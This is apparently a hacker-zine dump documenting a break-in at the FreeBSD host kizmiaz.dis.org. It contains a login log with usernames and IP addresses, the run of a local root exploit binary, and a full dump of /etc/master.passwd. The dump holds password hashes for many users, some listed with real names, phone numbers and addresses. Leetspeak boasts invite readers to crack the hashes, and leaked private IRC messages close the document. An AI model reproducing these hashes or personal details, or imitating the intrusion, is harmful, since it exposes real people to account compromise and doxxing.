00:37 - 00:39 (00:02) enrique ttyp3 70.180.216.196 Wed Dec 14 23:01 - 02:11 (03:09) ftp ftp 67.181.74.207 Wed Dec 14 22:50 - 22:52 (00:02) gessel ttyp2 66.174.92.162 Wed Dec 14 22:24 - 23:44 (01:19) aloke ttyp2 71.131.235.247 Wed Dec 14 16:34 - 16:53 (00:18) shipley ttyp0 216.240.45.19 Wed Dec 14 16:01 - 23:51 (4+07:49) dover ttyp0 216.240.45.19 Wed Dec 14 16:01 - 16:01 (00:00) bagg ftp 69.107.6.173 Wed Dec 14 14:27 - 14:46 (00:19) enrique ttyp6 70.180.216.196 Wed Dec 14 13:58 - 15:07 (1+01:09) ftp ftp 216.240.44.11 Wed Dec 14 13:48 - 13:49 (00:01) ftp ftp 216.240.44.11 Wed Dec 14 13:43 - 13:43 (00:00) gessel ttyp4 66.93.181.147 Wed Dec 14 12:07 - 20:23 (08:16) bifrost ttyp1 209.237.225.2 Wed Dec 14 11:15 - 23:14 (2+11:58) aloke ttyp0 71.131.226.167 Wed Dec 14 10:32 - 15:42 (05:09) enrique ttyp0 70.180.216.196 Wed Dec 14 07:23 - 07:39 (00:15) gessel ttyp4 66.93.181.147 Tue Dec 13 22:27 - 04:53 (06:25) enrique ttyp1 70.180.216.196 Tue Dec 13 22:04 - 11:15 (13:11) enrique ttyp4 70.180.216.196 Tue Dec 13 17:46 - 18:48 (01:01) aloke ttyp1 71.131.226.167 Tue Dec 13 09:30 - 18:15 (08:45) gessel ttyp1 71.198.45.135 Tue Dec 13 01:40 - 03:51 (02:10) gessel ttyp4 66.174.93.99 Mon Dec 12 15:26 - 17:24 (01:58) gessel ttyp4 24.62.5.193 Mon Dec 12 04:22 - 09:16 (04:54) enrique ttyp1 loraayn.com Mon Dec 12 02:12 - 21:12 (18:59) gessel ttyp4 66.174.92.164 Sun Dec 11 21:44 - 23:55 (02:10) gessel ttyp1 70.209.130.27 Sun Dec 11 19:51 - 23:22 (03:30) gessel ttyp1 71.49.210.30 Sun Dec 11 17:10 - 19:20 (02:10) enrique ttyp1 67.138.244.8 Sun Dec 11 15:40 - 15:47 (00:07) enrique ttyp6 70.180.216.196 Sun Dec 11 13:24 - 13:25 (00:00) enrique ttyp6 oes21.com Sun Dec 11 12:46 - 12:53 (00:07) aloke ttyp4 71.131.226.167 Sun Dec 11 12:43 - 16:32 (03:49) enrique ttyp4 pathanfamily.org Sun Dec 11 09:54 - 12:43 (02:48) gessel ttyp1 71.49.210.30 Sun Dec 11 09:50 - 14:37 (04:47) db_cooper ttyp1 24.23.217.85 Sun Dec 11 06:25 - 06:27 (00:02) gessel ttyp4 66.174.92.162 Sat Dec 10 21:53 - 00:16 (02:23) gessel ttyp5 71.49.210.30 Sat Dec 10 17:04 - 20:14 (03:09) gessel ttyp4 71.49.210.30 Sat Dec 10 16:51 - 19:01 (02:10) dover ttyp3 216.240.45.19 Sat Dec 10 11:45 - 15:52 (4+04:06) shipley ttyp3 69.42.8.15 Sat Dec 10 04:39 - 05:27 (00:48) shipley ttyp3 69.42.8.15 Sat Dec 10 03:51 - 04:06 (00:14) enrique ttyp1 70.180.216.196 Sat Dec 10 03:50 - 22:46 (18:55) enrique ttyp1 67.138.244.8 Sat Dec 10 03:17 - 03:34 (00:17) gessel ttyp3 71.49.210.30 Fri Dec 9 22:55 - 01:05 (02:10) shipley ttyp1 69.42.8.15 Fri Dec 9 22:23 - 02:17 (03:54) gessel ttyp1 66.174.92.163 Fri Dec 9 20:06 - 22:16 (02:10) shipley ttyp3 69.42.8.15 Fri Dec 9 19:01 - 21:11 (02:10) shipley ttyp3 69.42.8.15 Fri Dec 9 17:49 - 18:26 (00:36) shipley ttyp1 69.42.8.15 Fri Dec 9 17:40 - 19:58 (02:18) enrique ttyp1 70.180.216.196 Fri Dec 9 16:51 - 16:54 (00:02) enrique ttyp1 70.180.216.196 Fri Dec 9 14:30 - 14:40 (00:09) gessel ttyp4 71.49.210.30 Fri Dec 9 12:24 - 17:10 (04:45) aloke ttyp3 71.131.226.167 Fri Dec 9 11:19 - 16:42 (05:23) aloke ttyp1 71.131.179.62 Fri Dec 9 10:33 - 12:44 (02:10) gessel ttyp1 66.174.93.101 Thu Dec 8 19:04 - 22:00 (02:55) aloke ttyp1 71.131.179.62 Thu Dec 8 16:52 - 18:10 (01:18) shipley ttyp2 216.240.45.19 Thu Dec 8 15:38 - 15:41 (6+00:03) bifrost ttyp0 209.237.225.2 Thu Dec 8 15:31 - 04:12 (5+12:40) carla ttyp0 209.133.53.217 Thu Dec 8 14:58 - 14:58 (00:00) aloke ttyp6 71.131.179.62 Thu Dec 8 10:44 - 14:26 (03:42) db_cooper ttyp4 24.21.198.181 Thu Dec 8 10:17 - 16:27 (06:09) gessel ttyp2 71.198.45.135 Thu Dec 8 10:13 - 12:24 (02:10) aloke ttyp0 71.131.218.189 Thu Dec 8 09:40 - 12:13 (02:33) db_cooper ttyp2 24.21.198.181 Thu Dec 8 01:33 - 01:34 (00:00) gessel ttyp0 71.198.45.135 Thu Dec 8 00:55 - 03:55 (02:59) gessel ttyp0 66.93.181.147 Wed Dec 7 17:28 - 21:23 (03:55) enrique ttyp2 67.138.244.8 Wed Dec 7 16:42 - 16:44 (00:02) carla ttyp2 216.132.69.40 Wed Dec 7 15:30 - 15:35 (00:05) seric ttyp2 seric.com Wed Dec 7 15:11 - 15:12 (00:01) bitrush ttyp2 66.129.224.36 Wed Dec 7 13:45 - 13:47 (00:01) enrique ttyp2 70.180.216.196 Wed Dec 7 12:40 - 13:13 (00:32) aloke ttyp0 71.131.218.189 Wed Dec 7 09:42 - 17:17 (07:35) db_cooper ttyp2 24.21.198.181 Tue Dec 6 23:58 - 00:01 (00:02) enrique ttyp0 70.180.216.196 Tue Dec 6 23:58 - 00:01 (00:03) enrique ttyp4 70.180.216.196 Tue Dec 6 17:23 - 17:41 (00:18) almus ttyp6 67.180.208.137 Tue Dec 6 16:29 - 16:35 (00:06) carla ttyp7 209.133.53.217 Tue Dec 6 15:48 - 15:48 (00:00) bstring ttyp6 4.246.138.254 Tue Dec 6 15:40 - 15:50 (00:09) dover ttyp5 216.240.45.19 Tue Dec 6 13:02 - 16:11 (2+03:08) enrique ttyp4 70.180.216.196 Tue Dec 6 12:13 - 17:23 (05:10) aloke ttyp2 71.131.218.189 Tue Dec 6 09:38 - 18:11 (08:33) enrique ttyp2 66.235.215.176 Tue Dec 6 06:14 - 06:14 (00:00) enrique ttyp2 66.235.215.176 Tue Dec 6 06:11 - 06:12 (00:00) enrique ttyp4 70.180.216.196 Tue Dec 6 05:29 - 05:29 (00:00) enrique ttyp2 67.138.244.8 Tue Dec 6 05:26 - 05:43 (00:17) db_cooper ttyp4 24.21.198.181 Tue Dec 6 03:46 - 03:54 (00:08) shipley ttyp2 69.42.8.15 Tue Dec 6 01:36 - 04:21 (02:44) shipley ttyp4 69.42.8.15 Mon Dec 5 21:24 - 00:54 (03:29) shipley ttyp2 69.42.8.15 Mon Dec 5 21:09 - 21:58 (00:49) carla ttyp2 209.133.53.217 Mon Dec 5 17:16 - 17:17 (00:01) carla ttyp4 209.133.53.217 Mon Dec 5 15:22 - 15:26 (00:04) bifrost ttyp3 209.237.225.2 Mon Dec 5 12:37 - 15:13 (3+02:36) aloke ttyp2 71.131.218.189 Mon Dec 5 10:03 - 17:01 (06:58) shipley ttyp1 216.240.45.19 Mon Dec 5 09:23 - 16:20 (3+06:57) gessel ttyp0 66.93.181.156 Mon Dec 5 06:16 - 20:44 (1+14:27) shipley ttyp1 216.240.45.19 Sun Dec 4 18:53 - 23:44 (04:51) aloke ttyp0 71.131.218.189 Sun Dec 4 17:46 - 20:37 (02:50) bifrost ttyp1 209.237.225.2 Sun Dec 4 12:41 - 16:56 (04:14) aloke ttyp0 71.131.218.189 Sun Dec 4 11:22 - 17:32 (06:10) gessel ttyp1 66.174.93.100 Sat Dec 3 21:49 - 01:12 (03:22) enrique ttyp0 70.180.216.196 Sat Dec 3 21:42 - 02:43 (05:00) shipley ttyp0 216.240.45.19 Sat Dec 3 15:08 - 19:29 (04:21) enrique ttyp1 70.180.216.196 Sat Dec 3 13:24 - 13:25 (00:00) gessel ttyp1 71.49.214.235 Sat Dec 3 01:57 - 04:07 (02:10) gessel ttyp1 66.174.92.162 Fri Dec 2 22:33 - 22:36 (00:03) dover ttyp0 216.240.45.19 Fri Dec 2 20:36 - 13:35 (16:59) aloke ttyp1 71.131.218.189 Fri Dec 2 19:04 - 19:25 (00:21) gessel ttyp3 66.174.79.232 Fri Dec 2 15:10 - 17:22 (02:12) shipley ttyp2 216.240.45.19 Fri Dec 2 12:51 - 14:35 (1+01:43) carla ttyp1 www.transbay.net Fri Dec 2 11:55 - 18:16 (06:20) db_cooper ttyp1 24.21.198.181 Fri Dec 2 09:49 - 10:35 (00:46) aloke ttyp0 71.131.218.189 Fri Dec 2 09:41 - 19:15 (09:33) enrique ttyp2 70.180.216.196 Thu Dec 1 22:52 - 22:52 (00:00) carla ttyp5 209.133.53.217 Thu Dec 1 14:16 - 19:30 (05:14) carla ttyp5 209.133.53.217 Thu Dec 1 13:45 - 13:47 (00:01) db_cooper ttyp3 24.21.198.181 Thu Dec 1 13:26 - 12:19 (22:52) aloke ttyp2 71.131.218.189 Thu Dec 1 10:05 - 19:17 (09:12) enrique ttyp2 70.180.216.196 Thu Dec 1 09:15 - 09:18 (00:02) wtmp begins Thu Dec 1 09:15:35 PST 2005 [enrique@kizmiaz] $ uname -a FreeBSD kizmiaz.dis.org 5.0-DP1 FreeBSD 5.0-DP1 #8: Sat Nov 6 11:46:40 PST 2004 shipley@kizmiaz.dis.org:/usr/src/sys/i386/compile/KIZMIAZ i386 th3 r3zt 1z h1zt0ry.. w3'll k33p sn1ff1ng unt1l sh1pl3y r31nst4llz. h0no r3sp3ctz g0th1c h1ppy w1r3dr1v13rz 0f 4ll cr33dz. k33p h4q1ng! [enrique@kizmiaz] $ /tmp/fbsd-0ldd4y\(fl0kk3n\!\!\!\) -p 12:34:23 -f/tmp/targetz [!] working ................ [!] worked # cat /etc/master.passwd # # master.passwd,v 1.25 1999/09/13 17:09:07 peter Exp $ # #root:$1$guZyyUiO$FF3XGdq9cL3NLQfZ9MVGF/:0:0::0:0:Charlie &:/root:/bin/csh root:$1$DjE0i2EK$o7NA7p.2bPnv2/sRpt50y1:0:0::0:0:Charlie &:/root:/bin/csh toor:*:0:0::0:0:Bourne-again Superuser:/root: daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin operator:*:2:5::0:0:System &:/:/sbin/nologin bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin sshd:*:22:22::0:0:Ssh User:/var/empty:/sbin/nologin mailnull:*:26:26::0:0:Sendmail default User:/var/spool/mqueue:/sbin/nologin kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin games:*:7:13::0:0:Games pseudo-user:/usr/games:/sbin/nologin news:*:8:8::0:0:News Subsystem:/:/sbin/nologin man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin bind:*:53:53::0:0:Bind Sandbox:/var/named/var/named:/sbin/nologin uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico xten:*:67:67::0:0:X-10 daemon:/usr/local/xten:/sbin/nologin pop:*:68:6::0:0:Post Office Owner:/nonexistent:/sbin/nologin mp3:*:70:70::0:0:MP3 access :/nonexistent:/sbin/nologin www:*:80:80::0:0:WWW-server:/html/docs:/sbin/nologin wwws:*:81:81::0:0:Secure WWW-server:/html/docs:/sbin/nologin nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin shipley:$1$R2KJheGJ$2bguyDLKRrLyHKbpLY8UZ.:141:100:staff:0:0:Peter Shipley,Home,,510 849 2230:/home/shipley:/bin/csh pcguest:*:102:102::0:0:pc guest access:/noexist:/sbin/nologin brand:*anFuvWN.8ElXk:117:100::0:0::/home/brand:/bin/csh nathan:$1$1rIkgT0g$oGVRGnGOCsknZ6J.u.nsQ/:118:100::0:0:Nathan Trueblood,,,:/home/nathan:/bin/csh carla:2gepGyeNUYU82:126:100::0:0:Carla ?,,,:/home/carla:/bin/csh stryder:*Pg3L4cgZ46Dmg:203:100::0:0:Evil Stryder ,,,:/home/stryder:/bin/sh zac:snLErblZEentg:248:100::0:0:Evil Zac Franken,,,:/home/zac:/bin/sh daver:rH50FjjPutxvQ:254:100::0:0:Evil Dave,Hell,32,32:/home/daver:/bin/csh aloke:$1$eaURFYnM$yI1nA0YdKfv9PBBzbN3381:315:315::0:0:Minister of Information:/home/aloke:/bin/csh matt:$1$OXoVUufN$8VufM8hWgrQSAGc.dLN/10:1003:1003::0:0:matt:/home/matt:/bin/csh afr:loFmUBjIdTLA2:1004:1004::0:0:aFR:/home/afr:/bin/tcsh george:*cdUZbnGNFxntY:1005:100::0:0:,,,:/home/george:/bin/csh heather:dZWlj0q0JGH.Y:1009:100::0:0:heather,,,:/home/heather:/bin/csh lwpowers:BKYTlfGTgFZsU:1010:100::0:0:Brook Powers,,,:/home/lwpowers:/bin/csh gessel:$1$S7OOur.H$Vdtn7SbJjNONegb1oY.gl.:1011:100::0:0:,\,,:/home/gessel:/bin/csh julian:$1$aVAZkTMb$.aCpLZoV4PXWY92s7a7SM0:1015:1015::0:0:Julian Elischer:/home/julian:/bin/csh warbot:PMpeKV.bg.94w:1016:100::0:0:Wilhemina Arbot,,,:/home/warbot:/bin/csh nik:*4993EExQcslz2:1017:0::0:0:JoBob Briggs,back 40,nope,yeah right:/home/nik:/bin/csh harold:cYfwINEWvyJ9A:1019:1019::0:0:Harold Benson,,,:/home/harold:/bin/tcsh damon:$1$vo1WW7mC$rru3U9qNBgYdqSK3wnSii1:1020:1020::0:0:Damon,,,:/home/damon:/bin/csh ioscream:33b3ytRixtGWI:1023:1023::0:0:,,,:/home/ioscream:/bin/csh parmalac:31HUCdyL3/n9c:1024:1024::0:0:,,,:/home/parmalac:/bin/csh complink:30RncUnzOAuro:1025:1025::0:0:Computer Link Access Account,,,:/home/complink:/bin/csh expert:M6AmCQ8dheLpY:1026:1026::0:0:,,,:/home/expert:/bin/csh sarex:VEUZBMxeee6do:1031:1031::0:0:SareX,,,:/home/sarex:/bin/sh bifrost:9kEey0WTcbUTo:1033:1033::0:0:Evil Bifrost,,,:/home/bifrost:/bin/csh walkabout:fFDg4c4uPWmug:1034:1034::0:0:,,,:/home/walkabout:/bin/csh mkb:$1$4xlruvZb$Jbb.Lk6dYZmFK7VFj1Ln50:1036:1036::0:0:Mike Brodhead,Area 51,,510-547-8365:/home/mkb:/bin/tcsh almus:$1$NdB6m002$tNkmnz8TKT1HukE2WDcqC0:1037:1037::0:0:,,,:/home/almus:/bin/csh simsong:91OMf13jwRcLE:1039:1039::0:0:Simson L. Garfinkel,,,:/home/simsong:/bin/tcsh nhd:*DO/goYCqTG97k:1041:1041::0:0:NetWork Hacking Device,,,:/home/nhd:/bin/csh cimarron:qsj1oXEAQpj.Y:1042:100::0:0:Cim,,,:/home/cimarron:/bin/csh clay:271Z48qykIt.Y:1044:100::0:0:Clay Bain:/noexist:/bin/csh bstring:$1$MErxOH4k$AgxgvUlV2ovn2TrAuWVl11:1045:1045::0:0:,,,:/home/bstring:/bin/sh crack:*:1046:1046::0:0:,,,:/home/crack:/bin/csh bishopj:18l9gWyVY3GN.:1049:100::0:0:bishop joey,,,:/home/bishopj:/bin/csh milk:21Ym5Z0c.3ECU:1051:100::0:0:,,,:/home/milk:/bin/csh dc:UAUGsKxB1brhQ:1053:100::0:0:,,,:/home/dc:/bin/csh rsi:38PAyBrrWp9lE:1054:100::0:0:,,,:/home/rsi:/bin/sh karen:aaMxwpoq7.WEg:1055:100::0:0:,,,:/home/karen:/bin/csh seric:$1$EY2/M2n9$H2KODMGJhzWvo6B1/tUXM.:1056:1056::0:0:Evil Seric,,,:/home/seric:/bin/csh gruby:*15oNDd9zBeK/6:1057:100::0:0:Evil Gene,,,:/home/gruby:/bin/csh lagger:33Witv7rDBu0A:1058:100::0:0:Evil Wiesen,,,:/home/lagger:/bin/csh wk:h2Ln.BKOOHdzw:1059:1059::0:0:William Knowles,,,:/home/wk:/bin/csh metaxis:82q/Sk8hrPkCU:1060:1060::0:0:Ginny Tonic,I have an office?,(800)777-9388,:/home/metaxis:/bin/tcsh cb:*BADDPASS*47a0k4u6c4nOk:1061:100::0:0:,,,:/home/cb:/bin/csh dave:54IoU3DuBh3mM:1062:100::0:0:,,,:/home/dave:/bin/csh khti:$1$yW6Pje7m$83kTpXwBUT/ZGg9hkFE3Y1:1063:100::0:0:,,,,:/home/khti:/bin/csh smishey:kh/Ds0sgYe4Go:1064:1064::0:0:,,,:/home/smishey:/bin/csh chs:INprg2hN9oD4Y:1065:1065::0:0:Christian Hedegaard-Schou I,,,:/home/chs:/bin/sh v1ru5:$1$u3HZgPYI$dfyYtZV6YsAKP30.RYd8i1:1066:1066::0:0:v1ru5,,,:/home/v1ru5:/bin/csh tpete:64/2.I/8snal.:1068:1068::0:0:Tracy Peterson,www.ninthhouse.com,,:/home/tpete:/bin/csh cal:$1$2gHc8mUr$FNxZU6f0s5F0tx7Y1oomf0:1069:1069::0:0:Cal:/home/cal:/bin/csh wireman:MXgnyrWJ3zWSk:1070:1070::0:0:,,,:/home/wireman:/bin/csh shatter:$1$HjznUxQw$rGklAs6vJ/3VHGGJL46Bk0:1071:1071::0:0:,,,:/home/shatter:/bin/csh rc5des:*:1072:1072::0:0:RC5 challenge uid,,,:/home/rc5des:/bin/csh punkis:nRaqbZqhjvPx6:1074:1074::0:0:punkis ,,,:/home/punkis:/bin/sh comega:49J3tfn.z0zPs:1075:1075::0:0:Cancer Omega,Southern California,,:/home/comega:/bin/sh gh0st:DSERHoVkG3Rq.:1076:1076::0:0:,,,:/home/gh0st:/bin/csh mrmojo:$1$FKehTNKV$AwFXg80mj6yD1rKBSMOG/0:1078:1078::0:0:Mr. Mojo,,,:/home/mrmojo:/bin/csh bailey:t7BNiuBSu35uQ:1080:1080::0:0:Evil bailey,,,:/home/bailey:/bin/csh mentat:25yQFKq9R4BMY:1081:1081::0:0:,,,:/home/mentat:/bin/csh spork:kYT8kaRCxWCP6:1082:100::0:0:spork :/home/spork:/usr/local/bin/bash eris:92mjA5hyoxZVk:1083:100::0:0:Lenore D'Mort,,,:/home/eris:/bin/csh jkuroda:$1$12ErrPaA$VB0Ro4hvlv8To1GMzpB7V.:1084:100::0:0:jk,,,:/home/jkuroda:/bin/csh weldon:9PxczkV42.kJw:1085:100::0:0:Weldon Dodd,,,:/home/weldon:/bin/csh justabill:$1$J4UXQ1kH$EjUyYrNsMcaEFSJYVpPyK1:1086:100::0:0:,,,:/home/justabill:/bin/csh fwf:$1$FHoV3vZt$izkVSdJfscWtUMvm8ifDM1:1087:100::0:0:,,,:/home/fwf:/bin/csh sharon:45LMkfo83RnYE:1088:100::0:0:,,,:/home/sharon:/bin/csh jlc:78klFR8P9HG8E:1089:100::0:0:,,,:/home/jlc:/bin/csh arrawn:75snoytaqtsnY:1090:100::0:0:,,,:/home/arrawn:/bin/csh malikia:bC2cXH3o6ertI:1091:100::0:0:,,,:/home/malikia:/bin/csh angel:49eYDHgBHaTVg:1092:100::0:0:,,,:/home/angel:/bin/csh xs:PgnpiTcRaA9bU:1093:1093::0:0:xs,,,:/home/xs:/bin/sh jraff:49eYDHgBHaTVg:1094:100::0:0:,,,:/home/jraff:/bin/csh jdog:21D.6K92cFFLU:1095:1095::0:0:,,,:/home/jdog:/bin/csh oldwolf:$1$d.a5UDct$adTWC4Syy36xTho0NLnui1:1096:100::0:0:Gerald Tarrant,666 Hell Street,666-6666,go away:/home/oldwolf:/bin/csh grepcat:$1$7C95rldY$aL4CpEpSgFGfyBohrIyqJ1:1097:1097::0:0:Grep Catt,,,:/home/grepcat:/bin/csh jeru:$1$TqCo35g5$W8eWSfVrfNesM/jw2Qm0D.:1098:100::0:0:,,,:/home/jeru:/bin/sh pipe:48Jh1IBOzSR5U:1099:100::0:0:,,,:/home/pipe:/bin/sh bitrush:4dvmnn.huaAPs:1100:100::0:0::/home/bitrush:/usr/local/bin/bash pulley:dp6jjJ/I1D5zU:1101:1101::0:0:Eric S Pulley,,,707-579-4157 :/home/pulley:/bin/tcsh cfrankli:65ldy/VbHMzJ6:1103:1102::0:0:Chris Franklin,,,://home/cfrankli:/bin/csh rfrankli:41N4z0rR9MGt6:1104:1104::0:0:Roger Franklin,,510 758 2213,510 758 2213:/home/rfrankli:/bin/csh phon-e:35WInlWg82hcc:1105:1105::0:0:Phon-E,,,:/home/phon-e:/bin/csh wyatt:$1$AC2b3P6w$AaWk4Y2rU9psBs4U8BnJj0:1110:1110::0:0:Evil Wyatt ,-,-,-:/home/wyatt:/bin/csh steve:8YLhzPL/EUzek:1111:1110::0:0:Steven Kenshalo,209-578-4990,,:/home/steve:/bin/csh john:yXtkljoGZywOE:1112:1112::0:0:John Kenshalo,,,:/home/john:/bin/csh judy:28BCNLXm6cES.:1113:1113::0:0:Judy Kenshalo,,,:/home/judy:/bin/csh darkange:qm6G/cq7kXsus:1114:1114::0:0:DarkAngel,,,:/home/darkangel:/bin/tcsh attila:DnBTuFbhRaLiE.O6:1115:1115::0:0:Doug C.,,,:/home/attila:/bin/csh hpeyerl:$1$geXwlldF$jl3Gj4UiSMsoFLFLGaQht1:1118:1118::0:0:Herb Peyerl:/home/hpeyerl:/usr/local/bin/bash heathen:46zUKRjT3J/YE:1121:1121::0:0:,,,:/home/heathen:/bin/csh cassiel:$1$fVb6Fuz7$vWisLFp6CmPbF6XCf/7tf/:1230:1230::0:0:,,,:/home/cassiel:/bin/csh cardinal:$1$XbOY2TXr$JlRsCmZRTIc1PFnrJZnLM0:1048:100::0:0:,,,:/home/cardinal:/bin/csh sarah:$1$GqbMwgkl$DaUZHz61Tk8A7DwBc9fjV0:1250:1250::0:0:??,,,:/home/sarah:/bin/csh seventek:$1$fMdpbBsq$EY.BSS/krN8qf3JMAIxSQ/:1280:1280::0:0:Joeseph Seventek ,,,:/home/seventek:/bin/tcsh cyber:rJnxNCCFbxPCQ:2001:2001:staff:0:0:Evil Erik:/home/cyber:/bin/tcsh delux:8kwd1aLJCHs2M:2002:2002::0:0:Evil D. Meriwether,,,:/home/delux:/bin/csh muir:zkSihoVl8FhOI:2043:2043::0:0:David Muir Sharnoff,,,:/home/muir:/bin/csh jon:hGufGhBASbpTA:13402:100::0:0:Jon Blow,.,,:/home/jon:/bin/csh dover:$1$5aio3Gd5$yMu13fhRICWVkch8UWxBK.:30025:100::0:0:dover ,,,:/home/dover:/bin/csh fas:**40ehucFyFYo8s:32700:84:ftponly:0:0:www.fascinator.net ftp Account:/html/docs/www.fascinator.net/:/sbin/nologin bagg:IW7YeVtKCTcOw:32701:84:ftponly:0:0:BAGG ftp Account:/html/docs/www.bondage-a-go-go.com/:/sbin/ftponly berz:**Y9U7OTC9wSSy6:1001:1001::0:0:berz:/home/berz:/bin/csh default:AxYtQlu/9CwqU:1002:1002::0:0:default:/home/default:/bin/csh msmith:*:3003:3003::0:0:User &:/home/msmith:/bin/csh bill:XpysrWb6z9DcE:1006:999::0:0:bill scannell:/home/bill:/bin/csh ftp:**:14:5::0:0:Anonymous FTP Admin:/html/OLD/ftp/ftp.dis.org/:/nonexistent enrique:$1$mOjm834d$E8gmd4NP/5//U1qxZIpnP/:1007:1007::0:0:enrique:/home/enrique:/bin/sh gonzo:$1$iegkZZgG$QUC7.teiWvECEt7XRCoEM.:1014:1014::0:0:gonzo:/home/gonzo:/bin/csh testuser:**t0EqkM4evoxoM:1028:1028::0:0:testuser:/home/testuser:/bin/csh xam:Mu9ulQPpyBTKo:1029:1029::0:0:xam:/home/xam:/bin/csh rds:TIBme4UxWnkcg:1030:1030::0:0:rds:/home/rds:/bin/csh tom:$1$tZnm9.Tg$Gs25Fgu5vEErUlOVaAOsz0:1032:1032::0:0:tom:/home/tom:/bin/csh eh:$1$2.OdAQYs$WVofOR3NqIUdY6R.bqNAn/:1040:1040::0:0:eh:/home/eh:/bin/csh till:$1$9IKa/IOj$vXXp.jTfdsLrjgytheq.x0:1047:998::0:0:till:/home/till:/bin/csh splice:$1$bJvgdCU0$GHDX4BkW6HfofCRF9J6aM0:1067:997::0:0:splice:/home/splice:/bin/tcsh xenu:$1$xDTWp6y4$idPRu2tMHbKgA6u11VvDS.:1073:996::0:0:xenu:/home/xenu:/bin/csh andrew:**RBzXSm72KoYhk:1079:1079::0:0:andrew:/home/andrew:/bin/csh noise:$1$0YHvkqNW$wjVbvJEGIQXRUxX3JFzvJ.:1102:995::0:0:noise:/home/noise:/bin/sh bronc:$1$lrWSK2BH$mujKWzTg.LRNYwxfTFlQs1:10000:10000::0:0:bronc:/home/bronc:/bin/sh pablos:**$1$pCb9IrUe$SCjtCRER5PO7rMKTX/ha91:1106:1106::0:0:pablos:/home/pablos:/bin/csh wintamute:FRUBRptgXpGpg:1107:1107::0:0:wintamute:/home/wintamute:/bin/sh humperdink:$1$NZRsskK5$mi4XK5pB1.VECx2taJ2iX1:1108:1108::0:0:humperdink:/home/humperdink:/bin/csh grrlbot:$1$sSY2Ibyp$EC0FBtBH9gVI6S564nWqT.:1109:1109::0:0:grrlbot:/home/grrlbot:/bin/csh thalakan:$1$DKx5R.ea$MsJl4/GNgi5w51eqTty7d0:1116:1116::0:0:Jason Spence,,510 656 5690,650 520 5090:/home/thalakan:/usr/local/bin/bash static:$1$E9pk1gAQ$p66IPgElqCjnrEtMaXOSY1:1117:1117::0:0:static:/home/static:/bin/csh whysean:$1$oxqLK9HE$7CCyOmVvQX2VV.JhauQwT/:1119:1119::0:0:whysean:/home/whysean:/bin/csh czarina:$1$jXnU3Wz7$rnmJWvzzVGwUJFICEo8Xm1:1120:1120::0:0:czarina:/home/czarina:/bin/csh change:$1$SOzCTiLf$EFibZmlj0xhJYeZHKGTkA0:1122:1122::0:0:change:/home/change:/bin/csh palevsky:$1$22s2swRA$9zQqqXIl1VOMMPKH7gYj/.:1000:1000::0:0:palevsky:/home/palevsky:/bin/csh surlyone:kEhA0fuZjdi5Y:1012:1012::0:0:surlyone:/home/surlyone:/bin/csh roamer:$1$7O6h/3S1$Ysr2UKLLcwPQv6EBpryDx1:1013:1013::0:0:roamer:/home/roamer:/bin/csh arlynne:$1$NfpLjquv$w9RFTxrLsHoSnb1qCgeXr/:1018:1018::0:0:arlynne c:/home/arlynne:/bin/csh jrh:Nh.QSqonM5tUs:1021:1021::0:0:Josh Howard:/home/jrh:/bin/tcsh daiv:9UNz54RjRxZQk:1035:1035::0:0:daiv:/home/daiv:/bin/csh mikes:$1$x4cVbaR.$TYwn3wx4te8.6Nj4bJMvo.:1043:1043::0:0:Mike Seelau:/home/mikes:/bin/csh wenna:g4VW93DqT6BbY:1077:1077::0:0:wenna:/home/wenna:/bin/csh error:9Bhrqz4h12RXM:1123:1123::0:0:J.S.:/home/error:/bin/csh db_cooper:$1$ELEim/so$ZD5VQ/OyGOUpgkSMcOw2S1:1124:1124::0:0:trent:/home/db_cooper:/bin/csh jeedi:$1$ZoHXRhyG$cOlo8NJ/9VERWs/v/FvWR.:1125:1125::0:0:jeedi:/home/jeedi:/usr/local/bin/bash cat:z62RrjyYvOEnc:1126:1126::0:0:cat:/home/cat:/bin/csh auto:VURA1HGnDxTec:1127:1127::0:0:auto:/home/auto:/bin/csh olivas:$1$hwmR3yk8$M9sPohKEv3mcElvA4ssXR.:1128:1128::0:0:olivas:/home/olivas:/bin/csh ultraviolate:Y0445fYXblW7c:1129:1129::0:0:ultraviolate:/home/ultraviolate:/bin/csh papersplease:YktVy0a4bF5MU:6000:6000::0:0:papersplease:/html/docs/www.papersplease.org:/sbin/ftponly mischa:M54X73ZnJi67k:1130:1130::0:0:mischa scannell:/home/mischa:/bin/csh william:p01g5A0jARD5s:1131:1131::0:0:william scannell:/home/william:/bin/csh midnight:V9XSjzD0hAF4M:1132:1132::0:0:talthing:/home/midnight:/bin/csh evilboi:**$1$B11SBaHy$16TYczGKzv3/yW/zUjGn7/:1133:1133::0:0:evilboi:/home/evilboi:/usr/local/bin/bash glitch:JBnFBd06o16BA:1134:1134::0:0:marsha:/home/glitch:/bin/csh darkmas:YczG4FsJCUAPI:1135:1135::0:0:bill:/home/darkmas:/bin/csh [root@kizmiaz] # ^^^ Cr4ck d3z & c0m3 j01n uz. Th3 f1l3z 0n th1z b0x r0ckz ^^^ th4nkz t0 "the next teso" gr0up (n3tr1c) f0r l3tt1ng uz m0dd1fy th31r w0nd3rful w4r3z, wh1ch w3 c0uldnt h4v3 0wn3d d1s.0rg w1th0ut! 4ls0 th4nkz t0 dvdman f0r 4ll0w1ng b4ngbr0z b3 a t3stb3d (m0r3 0n th1z l4t3r). 18.txt -~-~-~ h3llm4n c4nt 4dm1n 3y3 w4z th1nk1ng.. w3 sh0uld juzt turn th1z z1n3 1nt0 a r3p0s1t0ry 0f ch4tl0gz. g00d 1d34 huh? 3y3 g0t k1qb4nn3d fr0m #darknet s0 fuq th3m. h3r3 4r3 s0m3 fr0m th3 s3lf pr0cl41m3d f0und3r 0f teso.. [MSGS ] [09:25pm] - Kas yup@vw-22606.optusnet.com.au talk us up [MSGS ] [09:25pm] - Kas yup@vw-22606.optusnet.com.au lol [SEND_MSG] [09:26pm] - #webdesign hah yeah that was a fun night [SEND_MSG] [09:27pm] - #webdesign memba the night tho we had 4 chicks and us 2 at my house.. in the spa.. then fucking in like every room in the house.. that was also a kick ass night. [SEND_MSG] [09:27pm] - kas i did that 